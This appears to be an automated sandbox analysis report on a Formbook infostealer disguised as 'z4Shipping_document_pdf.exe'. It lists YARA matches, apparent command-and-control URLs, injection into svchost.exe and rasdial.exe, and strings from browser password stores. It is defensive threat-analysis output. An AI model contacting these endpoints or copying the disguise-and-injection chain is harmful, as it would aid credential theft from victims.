            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 17:58:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 17:58:28 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 17:58:30 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 17:58:33 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 17:58:35 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 17:59:08 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66aa3fcf-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 17:59:10 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66aa3fcf-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 17:59:13 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66aa3fcf-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 30 Sep 2024 17:59:15 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66aa3fcf-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Mon, 30 Sep 2024 17:59:22 GMT | server: LiteSpeed | platform: hostinger | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-xss-protection: 1; mode=block | x-content-type-options: nosniff | vary: User-Agent | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Mon, 30 Sep 2024 17:59:25 GMT | server: LiteSpeed | platform: hostinger | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-xss-protection: 1; mode=block | x-content-type-options: nosniff | vary: User-Agent | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Mon, 30 Sep 2024 17:59:27 GMT | server: LiteSpeed | platform: hostinger | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-xss-protection: 1; mode=block | x-content-type-options: nosniff | vary: User-Agent | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Mon, 30 Sep 2024 17:59:30 GMT | server: LiteSpeed | platform: hostinger | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-xss-protection: 1; mode=block | x-content-type-options: nosniff | vary: User-Agent | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 30 Sep 2024 17:59:49 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 555 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 30 Sep 2024 17:59:51 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 555 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 30 Sep 2024 17:59:54 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 555 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 30 Sep 2024 17:59:57 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 555 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: rasdial.exe, 00000005.00000002.4551985733.000000000579C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.000000000348C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://animekuid.xyz/7u36/?2Zv0=qtmpl4wh&FbuX5DnP=RRg0VWAgukFyDCcWaOUK9J2JRQGKN1ekxOnlJwT3H1aqQkfKCZ
            Source: rasdial.exe, 00000005.00000002.4551985733.000000000560A000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.00000000032FA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://patioprojex.africa/iv79/?FbuX5DnP=aYGuHzYMPqEvnYXTlDqrzWS6BBG
            Source: fWXPcgRbOhi.exe, 00000007.00000002.4553080384.0000000004F1B000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lanxuanz.tech
            Source: fWXPcgRbOhi.exe, 00000007.00000002.4553080384.0000000004F1B000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lanxuanz.tech/1q08/
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rasdial.exe, 00000005.00000002.4551985733.00000000052E6000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.0000000002FD6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://jino.ru
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000005.00000003.2708154224.000000000789D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: rasdial.exe, 00000005.00000002.4551985733.0000000005DE4000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.0000000003AD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bayarcepat19.click/g48c/?2Zv0=qtmpl4wh&FbuX5DnP=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehsl
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: initial sample; Static PE information: Filename: z4Shipping_document_pdf.exe
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0282B5205_2_0282B520
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280AA505_2_0280AA50
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280C9D05_2_0280C9D0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02814F605_2_02814F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EE4335_2_045EE433
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EE7CC5_2_045EE7CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EE3145_2_045EE314
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045ED8385_2_045ED838
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04EF753E7_2_04EF753E
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED87CE7_2_04ED87CE
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED87C57_2_04ED87C5
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04EE0F7E7_2_04EE0F7E
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04EDD8BE7_2_04EDD8BE
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED89EE7_2_04ED89EE
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04EDF14E7_2_04EDF14E
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED6A6E7_2_04ED6A6E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0332B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03375130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03387E54 appears 96 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 047C7E54 appears 88 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 0476B970 appears 266 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 047FF290 appears 105 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 047EEA12 appears 84 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 047B5130 appears 36 times
            Source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004543000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z4Shipping_document_pdf.exe
            Source: z4Shipping_document_pdf.exe, 00000000.00000003.2133095429.00000000046ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z4Shipping_document_pdf.exe
            Source: z4Shipping_document_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/14
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe File created: C:\Users\user\AppData\Local\Temp\polygamodioecious
            Source: z4Shipping_document_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: rasdial.exe, 00000005.00000003.2711192652.0000000002B86000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4550647811.0000000002BBB000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2711118853.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4550647811.0000000002B86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: z4Shipping_document_pdf.exe ReversingLabs: Detection: 31%
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe File read: C:\Users\user\Desktop\z4Shipping_document_pdf.exe
            Source: unknown Process created: C:\Users\user\Desktop\z4Shipping_document_pdf.exe "C:\Users\user\Desktop\z4Shipping_document_pdf.exe"
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z4Shipping_document_pdf.exe"
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: wininet.dll
